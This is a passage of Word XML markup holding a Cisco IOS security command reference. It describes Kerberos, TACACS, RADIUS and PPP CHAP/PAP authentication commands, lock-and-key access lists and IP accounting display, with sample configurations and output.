        <w:t xml:space="preserve">Machine with the Kerberos SRVTAB fil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address </w:t>
        <w:tab/>
        <w:t xml:space="preserve">IP address of the machine with the Kerberos SRVTAB fil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ilename </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name of the SRVTAB fil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you use the kerberos srvtab remote command to copy the SRVTAB file from the remote host (generally the KDC), it parses the information in this file and stores it in the router's running configuration in the kerberos srvtab entry format. The key for each SRVTAB entry is encrypted with the private Data Encryption Standard (DES) key if one is defined on the router. To ensure that the SRVTAB is available (that is, that it does not need to be acquired from the KDC) when you reboot the router, use the write memory configuration command to write the router's running configuration to NVRA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command in the following example copies the SRVTAB file residing on bucket.cisco.com to a router named scooter.cisco.co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rberos srvtab remote bucket.cisco.com scooter.cisco.com-new-srvta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rvtab ent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 config-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4.9] key config-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key config-key global configuration command to define a private DES key for the router. Use the no form of this command to delete a private Data Encryption Standard (DES) key for the rou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 config-key 1 str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tring </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Private DES key (can be up to 8 alphanumeric character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DES-key defin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defines for the router a private DES key that will not show up in the router configuration. This private DES key can be used to DES-encrypt certain parts of the router's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ution The private DES key is unrecoverable. If you encrypt part of your configuration with the private DES key and lose or forget the key, you will not be able to recover the encrypted dat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command in the following example sets bubba as the private DES key on the rou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y config-key 1 bubb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rvtab entr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rberos srvtab remo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0] login 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configure your router to use TACACS user authentication, use the login tacacs line configuration command. Use the no form of this command to disable TACACS user authentication for a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gin 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login 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ne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can use TACACS security if you have configured a TACACS server and you have a command control language (CCL) script that allows you to use TACACS security. For information about using files provided by Cisco Systems to modify CCL scripts to support TACACS user authentication, refer to the "Configuring AppleTalk Remote Access" chapter in the Access Services Configuration Gui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is command cannot be used with AAA/TACACS+. Use the login authentication command instea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lines 1 through 16 are configured for TACACS user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ine 1 1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gin tacac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1] nasi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TACACS+ authentication for NetWare Asynchronous Services Interface (NASI) clients connecting to a router, use the nasi authentication line configuration command. Use the no form of the command to return to the default, as specified by the aaa authentication nasi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asi authentication {default | list-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login authentication {default | list-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fault </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the default list created with the aaa authentication nasi comman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st-name </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the list created with the aaa authentication nasi comman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s the default set with the aaa authentication nasi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ne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is a per-line command used with AAA authentication that specifies the name of a list of TACACS+ authentication methods to try at login. If no list is specified, the default list is used, even if it is specified in the command line. (You create defaults and lists with the aaa authentication nasi command.) Entering the no form of this command has the same effect as entering the command with the default argume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ution If you use a list-name value that was not configured with the aaa authentication nasi command, you will disable login on this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Before issuing this command, create a list of authentication processes by using the aaa authentication nasi global configuration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that the default AAA authentication be used on line 4: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ine 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si authentication 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that the AAA authentication list called list1 be used on line 7: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ine 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si authentication list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nasi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x nasi-server enabl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how ipx nasi connections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how ipx spx-protocol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2] pp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Challenge Handshake Authentication Protocol (CHAP) or Password Authentication Protocol (PAP) or both and to specify the order in which CHAP and PAP authentication are selected on the interface, use the ppp authentication interface configuration command. Use the no form of the command to disable this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authentication {chap | chap pap | pap chap | pap } [if-needed] [list-name | defaul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lli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pp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hap </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Enables CHAP on a serial interfac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ap </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Enables PAP on a serial interfac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hap pap </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Enables both CHAP and PAP, and performs CHAP authentication before PAP.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ap chap </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Enables both CHAP and PAP, and performs PAP authentication before CHAP.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needed </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Used with TACACS and extended TACACS. Does not perform CHAP or PAP authentication if the user has already provided authentication. This option is available only on asychronous interfac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st-name </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Used with AAA/TACACS+. Specifies the name of a list of TACACS+ methods of authentication to use. If no list name is specified, the system uses the default. The list is created with the aaa authentication ppp comman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fault </w:t>
        <w:tab/>
        <w:t xml:space="preserve">The name of the method list is created with the aaa authentication ppp comman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llin </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies authentication on incoming (received) calls only.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ution If you use a list-name value that was not configured with the aaa authentication ppp command, you will disable PPP on this interfa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authentication is not en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terface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you enable CHAP or PAP Authentication, or both, the local router requires the remote device to prove its identity before allowing data traffic to flow. PAP Authentication requires the remote device to send a name and password, which is checked against a matching entry in the local username database or in the remote TACACS/TACACS+ database. CHAP Authentication sends a Challenge to the remote device. The remote device encrypts the challenge value with a shared secret and returns the encrypted value and its name to the local Router in a Response message. The local router attempts to match the remote device's name with an associated secret stored in the local username or remote TACACS/TACACS+ database; it uses the stored secret to encrypt the original challenge and verify that the encrypted values match.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can enable PAP or CHAP, or both, in either order. If you enable both methods, the first method specified is requested during link negotiation. If the peer suggests using the second method, or refuses the first method, the second method is tried. Some remote devices support only CHAP, and some support only PAP. Base the order in which you specify methods on the remote device's ability to correctly negotiate the appropriate method, and on the level of data line security you require. PAP usernames and passwords are sent as cleartext strings, which can be intercepted and reused. CHAP has eliminated most of the known security hol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ing or disabling PPP authentication does not affect the local router's willingness to authenticate itself to the remote devi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you are using autoselect on a TTY line, you probably want to use the ppp authentication command to turn on PPP authentication for the corresponding interfa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enables CHAP on asynchronous interface 4 and uses the authentication list MIS-acc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face async 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capsulation pp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authentication chap MIS-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pp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new-mod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utoselect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capsulation ppp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use-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3] ppp chap host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ppp chap hostname interface configuration command to create a pool of dialup routers that all appear to be the same host when authenticating with CHAP. To disable this function, use the no form of the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chap hostname host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ppp chap hostname host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ostname </w:t>
        <w:tab/>
        <w:t xml:space="preserve">The name sent in the CHAP challeng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d. The router name is sent in any CHAP challeng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terface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urrently, a router dialing a pool of access routers requires a username entry for each possible router in the pool because each router challenges with its hostname. If a router is added to the dialup rotary pool, all connecting routers must be updated. The ppp chap hostname command allows you to specify a common alias for all routers in a rotary group to use so that only one username must be configured on the dialing route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is normally used with local CHAP authentication (when the router authenticates to the peer), but it can also be used for remote CHA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commands in the following example identify the dialer interface 0 as the dialer rotary group leader and specifies ppp as the method of encapsulation used by all member interfaces. CHAP authentication is used on received calls only. The username ISPCorp will be sent in all CHAP challenges and respons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face dialer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capsulation pp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authentication chap call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chap hostnmae ISPCor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pp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chap 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pa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4] ppp chap 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ppp chap password interface configuration command to enable a router calling a collection of routers that do not support this command (such as routers running older Cisco IOS software images) to configure a common CHAP secret password to use in response to challenges from an unknown peer. To disable this function, use the no form of this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chap password secr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chap password secr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ecret </w:t>
        <w:tab/>
        <w:t xml:space="preserve">The secret used to compute the response value for any CHAP challenge from an unknown pee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terface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allows you to replace several username and password configuration commands with a single copy of this command on any dialer interface or asynchronous group interfa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is used for remote CHAP authentication only (when routers authenticate to the peer) and does not affect local CHA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commands in the following example specify Integrated Services Digital Network (ISDN) Basic Rate Interface (BRI) number 0. The method of encapsulation on the interface is PPP. If a CHAP challenge is received from a peer whose name is not found in the global list of usernames, the encrypted secret 7 1267234591 is decrypted and used to create a CHAP response valu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face bri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capsulation pp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chap password 7 123456789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pp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chap host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pa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5] ppp pap sent-user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reenable remote PAP support for an interface and use the sent-username and password in the PAP authentication request packet to the peer, use the ppp pap sent-username interface configuration command. Use the no form of this command to disable remote PAP suppor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pap sent-username username password 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ppp pap sent-user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w:t>
        <w:tab/>
        <w:t xml:space="preserve">Username sent in the PAP authentication reques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assword </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Password sent in the PAP authentication reques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assword </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Must contain from 1 to 25 uppercase and lowercase alphanumeric character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emote PAP support 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must configure this command for each interfa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is command to reenable remote PAP support (for example to respond to the peer's request to authenticate with PAP) and to specify the parameters to be used when sending the PAP Authentication Reque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is a per-interface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commands in the following example identify dialer interface 0 as the dialer rotary group leader and specify PPP as the method of encapsulation used by the interface. Authentication is by CHAP or PAP on received calls only. ISPCor is the username sent to the peer if the peer requires the router to authenticate with PA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face dialer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capsulation pp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authentication chap pap call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chap hostname ISPC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pap sent username ISPCorp password 7 fjhfe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pap sent-username ISPCorp password 7 112365923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pp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chap host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chap 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use-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6] ppp use-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TACACS for PPP authentication, use the ppp use-tacacs interface configuration command. Use the no form of the command to disable TACACS for PP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use-tacacs [single-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ppp use-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is command is not used in AAA/TACACS+. It has been replaced with the aaa authentication ppp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ingle-line </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Accept the username and password in the username field. This option applies only when using CHAP authentic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 is not used for PP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ommand Mo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terface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is a per-interface command. Use this command only when you have set up an extended TACACS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CHAP authentication is being used, the ppp use-tacacs command with the single-line option specifies that if a username and password are specified in the username, separated by an asterisk (*), a standard TACACS login query is performed using that username and password. If the username does not contain an asterisk, then normal CHAP authentication is perform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feature is useful when integrating TACACS with other authentication systems that require a cleartext version of the user's password. Such systems include one-time password systems, token card systems, and Kerbero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ution Normal CHAP authentications prevent the cleartext password from being transmitted over the link. When you use the single-line option, passwords cross the link as cleartex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the username and password are contained in the CHAP password, the CHAP secret is not used by the Cisco IOS software. Because most PPP clients require that a secret be specified, you can use any arbitrary string, and the Cisco IOS software ignores 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asynchronous serial interface 1 is configured to use TACACS for CHA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face async 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authentication cha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use-tacac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asynchronous serial interface 1 is configured to use TACACS for PA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face async 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authentication pa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use-tacac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extend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ho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7] radius-server dead-ti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improve RADIUS response times when some servers might be unavailable, use the radius-server dead-time global configuration command to cause the unavailable servers to be skipped immediately. Use the no form of this command to set dead-time to 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adius-server dead-time minut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radius-server dead-ti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inutes </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Length of time a RADIUS server is skipped over by transaction requests, up to a maximum of 1440 minutes (24 hour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ad time is set to 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is command to cause the Cisco IOS to mark as "dead" RADIUS servers that fail to respond to authentication requests, thus avoiding the wait for the request to time out before trying the next configured server. A RADIUS server marked as "dead" is skipped by additional requests for the duration of minutes or unless there are no servers not marked "dea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5 minutes dead-time for RADIUS servers that fail to respond to authentication reques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adius-server dead-time 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adius-server ho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adius-server retransm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adius-server timeo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8] radius-server ho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specify a RADIUS server host, use the radius-server host global configuration command. Use the no form of this command to delete the specified RADIUS ho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adius-server host {hostname | ip-address} [auth-port port-number] [acct-port port-numb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radius-server host {hostname | ip-addr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ostname </w:t>
        <w:tab/>
        <w:t xml:space="preserve">DNS name of the RADIUS server hos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address </w:t>
        <w:tab/>
        <w:t xml:space="preserve">IP address of the RADIUS server hos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uth-port </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies the UDP destination port for authentication request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ort-number </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Port number for authentication requests; the host is not used for authentication if set to 0.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cct-port </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies the UDP destination port for accounting request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ort-number </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Port number for accounting requests; the host is not used for accounting if set to 0.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RADIUS host is specifi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can use multiple radius-server host commands to specify multiple hosts. The software searches for hosts in the order you specify the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host1 as the RADIUS server and uses default ports for both accounting and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adius-server host host1.company.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port 12 as the destination port for authentication requests and port 16 as the destination port for accounting requests on a RADIUS host named host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adius-server host host1.company.com auth-port 12 acct-port 1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at because entering a line resets all the port numbers, you must specify a host and configure accounting and authentication ports on a single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use separate servers for accounting and authentication, use the zero port value as appropriate. The following example specifies that RADIUS server host1 be used for accounting but not for authentication, and that RADIUS server host2 be used for authentication but not for account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radius-server host host1.company.com auth-port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radius-server host host2.company.com acct-port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ccounting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oriz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gin authentication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gin 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lip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5.9] radius-server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radius-server key global configuration command to set the authentication and encryption key for all RADIUS communications between the router and the RADIUS daemon. Use the no form of the command to disable the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adius-server key {str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radius-server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tring </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) The key used to set authentication and encryp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key must match the encryption used on the RADIUS daem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fter enabling AAA authentication with the aaa new-model command, you must set the authentication and encryption key using the radius-server key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Specify a RADIUS key after you issue the aaa newmodel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key entered must match the key used on the RADIUS daemon. All leading spaces are ignored, but spaces within and at the end of the key are used. If you use spaces in your key, do not enclose the key in quotation marks unless the quotation marks themselves are part of the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illustrates how to set the authentication and encryption key to "dare to g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adius-server key dare to g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gin authentication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gin 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lip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0] radius-server retransm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specify the number of times the Cisco IOS software searches the list of RADIUS server hosts before giving up, use the radius-server retransmit global configuration command. Use the no form of this command to disable retransmiss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adius-server retransmit retri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radius-server retransm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etries </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Maximum number of retransmission attempt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ree retri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Cisco IOS software tries all servers, allowing each one to time out before increasing the retransmit cou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a retransmit counter value of five tim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adius-server retransmit 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adius-server timeo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set the interval a router waits for a server host to reply, use the radius-server timeout global configuration command. Use the no form of this command to restore the defaul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adius-server timeout seco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radius-server timeo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econds </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Integer that specifies the timeout interval in second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5 seco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hanges the interval timer to 10 seco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adius-server timeout 1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gin authentication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gin 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lip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1] show kerberos cre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show kerberos creds EXEC command to display the contents of your credentials cach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how kerberos cre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keywords or argumen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show kerberos creds command is equivalent to the UNIX klist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users authenticate themselves with Kerberos, they are issued an authentication ticket called a credential. The credential is stored in a credential cach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ample Display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the entries in the credentials cache are display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outer&gt; show kerberos cre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 Principal: chet@cisco.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lid Starting          Expires                 Service Princip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8-Dec-1995 16:21:07    19-Dec-1995 00:22:24    krbtgt/CISCO.COM@CISCO.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output is returned that acknowledges that credentials do not exist in the credentials cach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gt; show kerberos cre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 Kerberos credenti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lear kerberos cre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2] show privileg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display your current level of privilege, use the show privilege EXEC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how privileg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ommand Mo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ample Displ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is sample output from the show privilege command. The current privilege level is 15.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 show privile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urrent privilege level is 1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password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3] tacacs-server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tacacs-server key global configuration command to set the authentication encryption key used for all TACACS+ communications between the access server and the TACACS+ daemon. Use the no form of the command to disable the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key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tacacs-server key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 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Key used to set authentication and encryption. This key must match the key used on the TACACS+ daem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fter enabling AAA with the aaa new-model command, you must set the authentication and encryption key using the tacacs-server key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key entered must match the key used on the TACACS+ daemon. All leading spaces are ignored; spaces within and at the end of the key are not. If you use spaces in your key, do not enclose the key in quotation marks unless the quotation marks themselves are part of the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illustrates how to set the authentication and encryption key to "dare to g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cacs-server key dare to g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new-mod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ho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4] tacacs-server login-timeo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specify how long the system will wait for login input (such as username and password) before timing out, use the tacacs-server login-timeout global configuration command. Use the no form of this command to restore the default value of 30 seco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login-timeout seco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tacacs-server login-timeout seco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econds </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Integer that determines the number of seconds the system will wait for login input before timing out. Available settings are from 1 to 300 second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default login timeout value is 30 seco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ith aaa new-model enabled, the default login timeout value is 30 seconds. The tacacs-server login-timeout command lets you change this timeout value from 1 to 300 seconds. To restore the default login timeout value of 30 seconds, use the no tacacs-server login-timeout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hanges the login timeout value to 60 seco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cacs login 6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5] tacacs-server authentica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configure the Cisco IOS software to indicate whether a user can perform an attempted action under TACACS and extended TACACS, use the tacacs-server authenticate global configuration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authenticate {connection [always]enable | slip [always] [access-lis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onnection </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Configures a required response when a user makes a TCP connec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w:t>
        <w:tab/>
        <w:t xml:space="preserve">Configures a required response when a user enters the enable comman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lip </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Configures a required response when a user starts a SLIP or PPP sess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lways </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Performs authentication even when a user is not logged in. This option only applies to the slip keywor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ccess-lists </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Requests and installs access lists. This option only applies to the slip keywor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tacacs-server authenticate [connection | enable] command first appeared in Cisco IOS Release 10.0. The tacacs-server authenticate {connection [always]enable | slip [always] [access-lists]} command first appeared in Cisco IOS Release 10.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ter one of the keywords to specify the action (when a user enters enable mode, for examp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Before you use the tacacs-server authenticate command, you must enable the tacacs-server extended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is command is not used in AAA/TACACS+. It has been replaced by the aaa authorization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onfigures TACACS logins that authenticate users to use Telnet or rlogi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cacs-server authenticate conne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secret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use-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6] tacacs-server directed-reque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send only a username to a specified server when a direct request is issued, use the tacacs-server directed-request global configuration command. Use the no form of this command to disable the direct-request featu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directed-reque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tacacs-server directed-reque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sends only the portion of the username before the "@" symbol to the host specified after the "@" symbol. In other words, with the directed-request feature enabled, you can direct a request to any of the configured servers, and only the username is sent to the specified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ing tacacs-server directed-request causes the whole string, both before and after the "@" symbol, to be sent to the default tacacs server. When the directed-request feature is disabled, the router queries the list of servers, starting with the first one in the list, sending the whole string, and accepting the first response that it gets from the server. The tacacs-server directed-request command is useful for sites that have developed their own TACACS server software that parses the whole string and makes decisions based on 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ith tacacs-server directed-request enabled, only configured TACACS servers can be specified by the user after the "@" symbol. If the host name specified by the user does not match the IP address of a TACACS server configured by the administrator, the user input is reject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no tacacs-server directed-request to disable the ability of the user to choose between configured TACACS servers and to cause the entire string to be passed to the default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enables tacacs-server directed-request so that the entire user input is passed to the default TACACS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 tacacs-server directed-requ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extend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an extended TACACS mode, use the tacacs-server extended global configuration command. Use the no form of this command to disable the mo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extend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tacacs-server extend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initializes extended TACACS. To initialize AAA/TACACS+, use the aaa new-model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enables extended TACACS mo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cacs-server extend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ho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specify a TACACS host, use the tacacs-server host global configuration command. Use the no form of this command to delete the specified name or addr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host hostname [single-connection] [port integer] [timeout integer] [key str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tacacs-server host host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ostname </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name or IP address of the hos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ingle-connection </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specify that the router maintain a single open connection for confirmation from a AAA/TACACS+ server (CiscoSecure Release 1.0.1 or later). This command contains no autodetect and fails if the specified host is not running a CiscoSecure daem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ort </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specify a server port numbe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teger </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Port number of the server (in the range 1 to 10,000).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imeout </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specify a timeout value. This overrides the global timeout value set with the tacacs-server timeout command for this server only.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teger </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Integer value, in seconds, of the timeout interval.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 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specify an authentication and encryption key. This must match the key used by the TACACS+ daemon. Specifying this key overrides the key set by the global command tacacs-server key for this server only.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tring </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Character string specifying authentication and encryption key.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TACACS host is specifi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can use multiple tacacs-server host commands to specify additional hosts. The Cisco IOS software searches for hosts in the order in which you specify them. Use the single-connection, port, timeout, and key options only when running a AAA/TACACS+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Because some of the parameters of the tacacs-server host command override global settings made by the tacacs-server timeout and tacacs-server key commands, you can use this command to enhance security on your network by uniquely configuring individual route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a TACACS host named Sea_Chang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cacs-server host Sea_Chan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that, for AAA confirmation, the router consult the CiscoSecure TACACS+ host named Sea_Cure on port number 51. The timeout value for requests on this connection is 3 seconds; the encryption key is a_secr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cacs-server host Sea_Cure single-connection port 51 timeout 3 key a_secr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gin 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lip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timeo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7] tacacs-server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tacacs-server key global configuration command to set the authentication encryption key used for all TACACS+ communications between the access server and the TACACS+ daemon. Use the no form of the command to disable the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key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tacacs-server key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 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Key used to set authentication and encryption. This key must match the key used on the TACACS+ daem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fter enabling AAA with the aaa new-model command, you must set the authentication and encryption key using the tacacs-server key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key entered must match the key used on the TACACS+ daemon. All leading spaces are ignored; spaces within and at the end of the key are not. If you use spaces in your key, do not enclose the key in quotation marks unless the quotation marks themselves are part of the ke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illustrates how to set the authentication and encryption key to "dare to g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cacs-server key dare to g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new-mod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ho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8] tacacs-server last-resor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cause the network access server to request the privileged password as verification, or to allow successful login without further input from the user, use the tacacs-server last-resort global configuration command. Use the no tacacs-server last-resort command to restore the system to the default behavio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last-resort {password | succe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tacacs-server last-resort {password | succe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assword </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Allows the user to access the EXEC command mode by entering the password set by the enable comman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ucceed </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Allows the user to access the EXEC command mode without further ques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when running the TACACS server, the TACACS server does not respond, the default action is to deny the reque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tacacs-server last-resort command to be sure that login can occur; for example, when a systems administrator needs to log in to troubleshoot TACACS servers that might be dow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is command is not used in AAA/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forces successful logi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cacs-server last-resort succe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password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gin (EXEC)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6.9] tacacs-server notif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tacacs-server notify global configuration command to cause a message to be transmitted to the TACACS server, with retransmission being performed by a background process for up to 5 minutes. Use the no form of this command to disable notif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notify {connection [always] | enable | logout [always] | slip [alway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tacacs-server notif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onnection </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies that a message be transmitted when a user makes a TCP connec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lways </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Sends a message even when a user is not logged in. This option applies only to SLIP or PPP sessions and can be used with the logout or slip keyword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w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies that a message be transmitted when a user enters the enable comman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gout </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies that a message be transmitted when a user logs ou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lip </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies that a message be transmitted when a user starts a SLIP or PPP sess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message is transmitted to the TACACS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The always and slip commands first appeared in Cisco IOS Release 11.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terminal user receives an immediate response, allowing access to the feature specified. Enter one of the keywords to specify notification of the TACACS server upon receipt of the corresponding action (when user logs out, for examp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is command is not used in AAA/TACACS+. It has been replaced by th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ccounting suite of comma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ets up notification of the TACACS server when a user logs o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cacs-server notify log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7.0] tacacs-server optional-pass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specify that the first TACACS request to a TACACS server be made without password verification, use the tacacs-server optional-passwords global configuration command. Use the no form of this command to restore the defaul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optional-pass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tacacs-server optional-pass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the user enters in the login name, the login request is transmitted with the name and a zero-length password. If accepted, the login procedure completes. If the TACACS server refuses this request, the server software prompts for a password and tries again when the user supplies a password. The TACACS server must support authentication for users without passwords to make use of this feature. This feature supports all TACACS requests---login, SLIP, enable, and so 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is command is not used by AAA/TACAC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onfigures the first login to not require TACACS verif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cacs-server optional-passwo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7.1] tacacs-server retransm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specify the number of times the Cisco IOS software searches the list of TACACS server hosts before giving up, use the tacacs-server retransmit global configuration command. Use the no form of this command to disable retransmiss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retransmit retri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tacacs-server retransm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etries </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Integer that specifies the retransmit coun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wo retri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Cisco IOS software will try all servers, allowing each one to time out before increasing the retransmit cou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a retransmit counter value of five tim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cacs-server retransmit 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7.2] tacacs-server timeo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set the interval that the server waits for a server host to reply, use the tacacs-server timeout global configuration command. Use the no form of this command to restore the defaul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timeout seco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tacacs-server timeo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econds </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Integer that specifies the timeout interval in seconds (between 1 and 300).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5 seco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hanges the interval timer to 10 seco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cacs-server timeout 1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acacs-server ho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7.3] Traffic Filter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hapter describes the commands used to configure Lock-and-key security (IP onl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ther traffic filter commands are protocol-specific, and are therefore described in the appropriate protocol-specific chapters in the Cisco IOS command references. You should refer to these protocol-specific chapters to find detailed information about traffic filter commands for each protocol. (Many of these protocols refer to the filters as "access lis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pecific information about configuring traffic filters (access lists) for these protocols can be found in protocol-specific chapters in the Cisco IOS configuration guides. General guidelines for using access lists can be found in the "Configuring Traffic Filters" chapter of the Security Configuration Gui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ck-and-key security is implemented with extended IP dynamic access lists. Lock-and-key security is available only for IP traffic, but provides more security functions than traditional static traffic filte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7.4] access-enab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the router to create a temporary access list entry in a dynamic access list, use the access-enable EXEC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ccess-enable [host] [timeout minut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ost </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Tells the software to enable access only for the host from which the Telnet session originated. If not specified, the software allows all hosts on the defined network to gain access. The dynamic access list contains the network mask to use for enabling the new network.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imeout minutes </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Specifies an idle timeout for the temporary access list entry. If the access list entry is not accessed within this period, it is automatically deleted and requires the user to authenticate again. The default is for the entries to remain permanently. We recommend that this value equal the idle timeout set for the WAN connec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enables the lock-and-key access featu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should always define either an idle timeout (with the timeout keyword in this command) or an absolute timeout (with the timeout keyword in the access-list command). Otherwise, the temporary access list entry will remain, even after the user terminates the sess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auses the software to create a temporary access list entry and tells the software to enable access only for the host from which the Telnet session originated. If the access list entry is not accessed within 2 minutes, it is delet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utocommand access-enable host timeout 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ccess-list (extended)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utocommand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7.5] access-templa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manually place a temporary access list entry on a router to which you are connected, use the access-template EXEC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ccess-template [access-list-number | name] [dynamic-name] [source] [destination] [timeout minut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ccess-list-number </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Number of the dynamic access lis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ame </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name of an IP access list. The name cannot contain a space or quotation mark, and must begin with an alphabetic character to avoid ambiguity with numbered access list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ynamic-name </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Name of a dynamic access lis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ource </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Source address in a dynamic access list. The keywords host and any are allowed. All other attributes are inherited from the original access-list entry.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stination </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Destination address in a dynamic access list. The keywords host and any are allowed. All other attributes are inherited from the original access-list entry.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imeout minutes </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Specifies a maximum time limit for each entry within this dynamic list. This is an absolute time, from creation, that an entry can reside in the list. The default is an infinite time limit and allows an entry to remain permanently.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provides a way to enable the lock-and-key access featu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should always define either an idle timeout (with the timeout keyword in this command) or an absolute timeout (with the timeout keyword in the access-list command). Otherwise, the dynamic access list will remain, even after the user has terminated the sess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the software enables IP access on incoming packets in which the source address is 172.29.1.129 and the destination address is 192.168.52.12. All other source and destination pairs are discard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ccess-template 101 payroll host 172.29.1.129 host 192.168.52.12 timeout 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ccess-list (extended)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utocommand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lear access-templa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7.6] clear access-templa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manually clear a temporary access list entry from a dynamic access list, use the clear access-template EXEC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lear access-template [access-list-number | name] [dynamic-name] [source] [destin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ccess-list-number </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Number of the dynamic access list from which the entry is to be delet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ame </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name of an IP access list from which the entry is to be deleted. The name cannot contain a space or quotation mark, and must begin with an alphabetic character to avoid ambiguity with numbered access list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ynamic-name </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Name of the dynamic access list from which the entry is to be delet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ource </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Source address in a temporary access list entry to be delet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stination </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Destination address in a temporary access list entry to be delet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is related to the lock-and-key access feature. It clears any temporary access list entries that match the parameters you def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lears any temporary access list entries with a source of 172.20.1.12 from the dynamic access list named vendo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lear access-template vendor 172.20.1.1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ccess-list (extended)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ccess-templa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7.7] show ip account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display the active accounting or checkpointed database or to display access-list violations, use the show ip accounting privileged EXEC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how ip accounting [checkpoint] [output-packets | access-violation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heckpoint </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Indicates that the checkpointed database should be display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utput-packets </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Indicates that information pertaining to packets that passed access control and were successfully routed should be displayed. This is the default value if neither output-packets nor access-violations is specifi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ccess-violations </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Indicates that information pertaining to packets that failed access lists and were not routed should be display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neither the output-packets nor access-violations keyword is specified, show ip accounting displays information pertaining to packets that passed access control and were successfully rout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ommand Mo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use this command, you must first enable IP accounting on a per-interface basi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ample Display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ollowing is sample output from the show ip accounting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 show ip accoun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ource           Destination              Packets               Byt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19.40     172.30.67.20                     7                 30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13.55     172.30.67.20                    67                274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2.50      172.30.33.51                    17                111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2.50      172.30.2.1                       5                 31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2.50      172.30.1.2                     463               3099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19.40     172.30.2.1                       4                 26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19.40     172.30.1.2                      28                255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20.2     172.30.6.100                    39                218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13.55    172.30.1.2                      35                302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19.40    172.30.33.51                  1986               9509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2.50     172.30.67.20                   233               1490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13.28    172.30.67.53                   390               2481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13.55    172.30.33.51                214669             980665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13.111   172.30.6.23                  27739             112660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13.44    172.30.33.51                 35412             152398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7.21     172.30.1.2                      11                 82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13.28    172.30.33.2                     21                176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2.166    172.30.7.130                   797              14105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3.11     172.30.67.53                     4                 24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7.21     172.30.33.51                 15696              69563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7.24     172.30.67.20                    21                 91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13.111   172.30.10.1                     16                113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ield </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Descrip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ource </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Source address of the packe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stination </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Destination address of the packe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ackets </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Number of packets transmitted from the source address to the destination addres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Bytes </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Number of bytes transmitted from the source address to the destination addres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ollowing is sample output from the show ip accounting access-violations command. (The following displays information pertaining to packets that failed access lists and were not rout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 show ip accounting access-viol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Source          Destination        Packets        Bytes      AC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19.40   172.30.67.20       7              306        7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13.55   172.30.67.20       67             2749       18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2.50    172.30.33.51       17             1111       14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2.50    172.30.2.1         5              319        14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72.30.19.40   172.30.2.1         4              262        7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ccounting data age is 4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ield </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Descrip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ource </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Source address of the packe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stination </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Destination address of the packe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ackets </w:t>
        <w:tab/>
        <w:t xml:space="preserve">For accounting keyword, number of packets transmitted from the source address to the destination addr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or access-violations keyword, number of packets transmitted from the source address to the destination address that violated the access control lis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Bytes </w:t>
        <w:tab/>
        <w:t xml:space="preserve">For accounting keyword, number of bytes transmitted from the source address to the destination addr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or access-violations keyword, number of bytes transmitted from the source address to the destination address that violated the access-control lis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CL </w:t>
        <w:tab/>
